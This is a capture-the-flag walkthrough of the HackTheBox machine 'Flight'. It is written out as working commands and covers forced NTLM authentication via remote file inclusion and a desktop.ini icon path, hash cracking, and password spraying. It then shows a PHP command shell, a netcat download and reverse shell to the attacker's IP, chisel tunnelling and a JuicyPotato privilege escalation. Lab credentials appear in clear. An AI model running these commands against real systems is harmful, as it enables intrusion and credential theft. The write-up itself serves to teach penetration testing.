Flight from HackTheBox which involved Forced NTLM Authentication, getting svc_apache’s hash, password spraying on the enumerated usernames will lead us to S.moon which had write access to Shared share allowing us to upload a desktop.ini and again performing forecd authentication to get c.bum’s hash, this user had access to web directory through smb allowing us to upload a php file giving us command execution as svc_apache, on enumerating local ports, port 8000 was running and hosting the directory from C:\inetpub\development, on uploading an aspx file they returned us commands running in context of iis appol , a service account which had SeImpersonate privileged enabled which can be abused through Juicy-Potato to get system shell.
NMAP
Nmap scan report for 10.10.11.187
Host is up (0.28s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
| http-methods:
| Supported Methods: POST OPTIONS HEAD GET TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
|_http-title: g0 Aviation
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-12-17 00:13:14Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49690/tcp open msrpc Microsoft Windows RPC
49699/tcp open msrpc Microsoft Windows RPC
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windowsPORT 139/445 (SMB)
Checking null authentication on SMB shows that we can’t access any share through anonymously
PORT 80 (HTTP)
The site didn’t had anything there as it was just a page with no links also gobuster didn't showed anything interesting to as well
So adding flight.htb in /etc/hosts file as we can see the domain name at the bottom of the page
Fuzzing for subdomains using wfuzz
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://flight.htb' -H "Host: FUZZ.flight.htb" --hh 7069Adding this subdomain in hosts file and accessing the site
Checking for Local File Inclusion it filters .. if it's in the url but allows /
Foothold (Svc_apache)
Running wfuzz again to fuzz for LFI payloads we find that we can just specify a file name without using ..
Let’s verify if we have remote file inclusion if we do we can just try accessing a fake share on our machine and use responder to capture NTLMv2 hash
We have a hit so now running responder and accessing a fake share with //IP/share
responder -I tun0http://school.flight.htb/index.php?view=//10.10.14.28/uwuSaving this hash in a file cracking it with john
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txtWith the valid credentials we can start enumerating the shares and usernames through crackmapexec
Using enum4linux to query usernames and filtering usernames so that we can password spray on them
enum4linux-ng -A flight.htb -u 'svc_apache' -p 'S@Ss!K@*t13' | grep username | awk -F : {'print $2'} > users.txtS.moon
Using either cme or kerbrute to perform password spary we’ll get S.Moon having the same password
kerbrute passwordspray -d flight.htb --dc 10.10.11.187 ./users.txt 'S@Ss!K@*t13'cme smb flight.htb -u users.txt -p 'S@Ss!K@*t13' --continue-on-successChecking shares with s.moon, we see that we have write access on `shared`
C.bum
On uploading .scf file extension to perform forced authentication it didn't allowed us to upload that extension, not sure why
But on uploading desktop.ini file it worked
[.ShellClassInfo]
IconResource=\\10.10.14.28\aaCracking this hash again with john
Foothold
This user has write access on web share which means that we can upload php file which will be reflected on schooled.flight.htb
Uploading a php file calling phpinfo()
<?php phpinfo(); ?>Having the ability to execute commands on the system we can get a reverse shell by uploading nc.exe and executing it
http://school.flight.htb/uwu.php?cmd=curl+10.10.14.28:2222/nc64.exe -o C:\Windows\Temp\nc64.exe
http://school.flight.htb/uwu.php?cmd=C:\Windows\Temp\nc64.exe 10.10.14.28 3333 -e powershell.exeSince we already have credentials of c.bum we can execute commands through that user using RunasC.exe
.\RunasCs.exe c.bum Tikkycoll_431012284 whoamiRunning netstat, we’ll see that there’s port 8000 open locally
Port forwarding port 8000 using chisel
chisel server --reverse -p 8001And running the client on the target machine
.\chisel.exe client 10.10.14.28:8001 R:8000:127.0.0.1:8000Accessing the port on our browser shows that access is denied
But this shows the path where the directory is hosted, C:\inetpub\Development
In this folder, there are few html files
Running icacls on the development folder shows that c.bum has write access
Using RunasCs we can switch user as c.bum and transfer aspx shell in that directory
.\RunasCs.exe c.bum Tikkycoll_431012284 'curl 10.10.14.28:2222/aspx_shell.aspx -o C:\inetpub\Development\shell.aspx'Accessing the file through the browser
I tried executing nc.exe to get a reverse shell but it wasn’t working for some reason so instead I generated a msfvenom payload
Transfer it and execute it
On checking privileges of iis appol , SeImpersonate was enabled
To abuse this, we can use JuicyPotato-ng to get a system shell
.\potatoe.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c C:\Windows\Temp\nc.exe 10.10.14.28 6666 -e cmd.exe"